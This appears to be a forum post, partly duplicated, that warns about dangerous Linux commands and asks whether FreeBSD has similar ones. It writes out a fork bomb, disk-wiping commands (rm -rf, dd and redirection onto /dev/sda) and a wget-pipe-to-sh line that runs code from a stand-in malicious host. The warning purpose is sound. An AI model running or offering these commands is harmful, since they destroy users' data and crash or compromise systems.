It has come to my attention that exist commands dangerous of Linux that you NEVER should to realize, for example:
This command works as a "Fork Bomb", it operates defining a function called ':', which is called twice, once in the foreground and other in the background, the process repeats indefinitely until the system crashe
Examples of other commands dangerous of Linux that you NEVER should to realize are the following:
Exist also in FreeBSD commands dangerous that you NEVER should to realize?
I try to type ( :(){:|:&};: )
But appears :(){:|:&};:
It has come to my attention that exist commands dangerous of Linux that you NEVER should to realize, for example:
This command works as a "Fork Bomb", it operates defining a function called ':', which is called twice, once in the foreground and other in the background, the process repeats indefinitely until the system crashe
Examples of other commands dangerous of Linux that you NEVER should to realize are the following:
rm -rf
> /dev/sda
mv pasta/diretório /dev/null
wget http://malicious_source -O- | sh
dd if=/dev/random of=/dev/sda
I try to type ( :(){:|:&};: )
But appears :(){:|:&};: